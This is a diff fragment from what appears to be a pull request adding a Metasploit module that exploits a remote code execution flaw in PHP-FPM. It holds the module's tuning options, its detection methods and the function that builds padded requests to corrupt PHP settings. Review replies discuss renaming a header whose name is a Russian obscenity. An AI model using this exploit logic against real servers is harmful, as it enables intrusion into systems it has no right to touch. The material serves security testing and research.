modules/exploits/multi/http/php_fpm_rce.rb

```diff
@@ -0,0 +1,428 @@
+      OptInt.new('MinQSL', [true, 'Minimum query string length', 1500]),
+      OptInt.new('MaxQSL', [true, 'Maximum query string length', 1950]),
+      OptInt.new('QSLHint', [false, 'Query string length hint']),
+      OptInt.new('QSLDetectStep', [true, 'Query string length detect step', 5]),
+      OptInt.new('MaxQSLCandidates', [true, 'Max Query string length candidates', 10]),
+      OptInt.new('MaxQSLDetectDelta', [true, 'Max Query string length detection delta', 10]),
+      OptInt.new('MaxCustomHeaderLength', [true, 'Max custom header length', 256]),
+      OptInt.new('CustomHeaderLengthHint', [false, 'Custom header length hint']),
+      OptString.new('DetectMethod', [
+        true,
+        "Detection method (available methods: #{self.class.detect_methods.keys.join(', ')})",
+        'session.auto_start',
+        self.class.detect_methods.keys,
+        /(#{self.class.detect_methods.keys.join('|')})/
+      ]),
+      OptInt.new('PosOffset', [true, 'Position offset', 34]),
+      OptInt.new('OperationMaxRetries', [true, 'Maximum of operation retries', 20])
+    ])
+  end
+
+  CHECK_COMMAND   = "which+which"
+  SUCCESS_PATTERN = "/bin/which"
+
+  class DetectMethod
+    attr_reader :php_option_enable, :php_option_disable
+
+    def initialize(php_option_enable:, php_option_disable:, check_cb:)
+      @php_option_enable = php_option_enable
+      @php_option_disable = php_option_disable
+      @check_cb = check_cb
+    end
+
+    def php_option_enabled?(res)
+      !!@check_cb.call(res)
+    end
+  end
+
+  def self.detect_methods
+    {
+      'session.auto_start' => DetectMethod.new(
+        php_option_enable: 'session.auto_start=1',
+        php_option_disable: 'session.auto_start=0',
+        check_cb: ->(res) { res.get_cookies =~ /PHPSESSID=/ }
+      ),
+      'output_handler.md5' => DetectMethod.new(
+        php_option_enable:  'output_handler=md5',
+        php_option_disable: 'output_handler=NULL',
+        check_cb: ->(res) { res.body.length == 16 }
+      )
+    }
+  end
+
+  def send_crafted_request(path:, qsl: datastore['MinQSL'], customh_length: 1, prefix: '', allow_retry: true)
+    uri = URI.encode(normalize_uri(target_uri.path, path)).gsub(/([?&])/, {'?'=>'%3F', '&'=>'%26'})
+    qsl_delta = uri.length - path.length - URI.encode(target_uri.path).length
+    if qsl_delta.odd?
+      fail_with Failure::Unknown, "Got odd qslDelta, that means the URL encoding gone wrong: path=#{path}, qsl_delta=#{qsl_delta}"
+    end
+    qsl_prime = qsl - qsl_delta/2 - prefix.length
+    if qsl_prime < 0
+      vprint_error("qsl value too small: qsl=#{qsl}, qsl_delta=#{qsl_delta}, prefix=#{prefix}")
+    end
+    uri = "#{uri}?#{prefix}#{'Q'*qsl_prime}"
+    opts = {
+      'method'  => 'GET',
+      'uri'     => uri,
+      'agent'   => 'Mozilla/5.0',
+      'headers' => {
+        'CustomH' => "x=#{Rex::Text.rand_text_alphanumeric(customh_length)}",
+        'Ebut'    => Rex::Text.rand_text_alphanumeric(11)
```

Comment:
Can you change this word, too?

Reply:
Sure, the hash value of the environment variable for this header (`HTTP_EBUT`) must match the hash value of `PHP_VALUE`. I will do the math and try to find another value.

Reply:
No worries. It just means "to fuck" in Russian. (:

Reply:
Oh! I'm not really fluent in Russian, but I was suspecting something along the line :/ I will change it.

Reply:
Me neither. I'm fluent in Google Translate, though. Or searching for Romanized versions of words. 😆